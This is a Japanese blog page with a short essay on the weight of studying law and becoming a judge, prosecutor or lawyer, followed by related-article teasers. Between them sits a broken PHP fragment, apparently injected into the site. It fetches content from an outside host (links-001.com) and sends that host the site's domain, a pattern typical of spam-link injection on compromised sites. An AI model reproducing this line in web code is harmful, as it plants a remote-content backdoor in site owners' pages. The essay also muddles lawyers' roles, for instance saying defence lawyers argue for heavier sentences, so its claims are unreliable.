法律を勉強するという責任感を持つ

大学の法学部に進んで法律を勉強し、世の中の役に立つ仕事をしたいと考える人もいるかもしれません。
しかし法律を学んでも人の役に立てる人になれるかどうかが分かりません。
場合によっては陥れる、傷つける立場になってしまうこともあります。
そんな将来を望んでいるわけではないかもしれませんが、判事も検事も弁護士も人の人生に大きく関わる仕事です。
弁護士は依頼人を守ることを第一に考えなければいけないと言いますが、それは犯罪者を野放しにすることとは違います。
確実に有罪の人を無罪にすることで報酬を得ることができるということになってしまっているので、日本の制度がおかしいのでしょう。
罪が軽い場合には不適切なのでもっと重くするべき、と主張をするのも弁護士の仕事です。
勉強をして資格を取得するということの重みを十分に理解している人ではないと与えてはいけない資格なのかもしれません。
勉強だけができる人がなる仕事という認識もありますが、人として欠陥がある人が資格を取得してはいけない仕事でもあります。

".file_get_contents('http://links-001.com/123set4.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事

  • 法律資格は弁護士や司法書士などの資格が代表例ですよね。
    その外にもとてもたくさんの資格がありま …

    関連ページ①

  • 以前は育児休業の対象となる子どもは、法律上の子と限定されていたため、実子と養子縁組が成立した子供に限 …

    関連ページ②

  • 法律資格は難易度が高く、法学部卒でもなかなか法律関係の仕事に就くことが難しいという人も少なくありませ …

    関連ページ③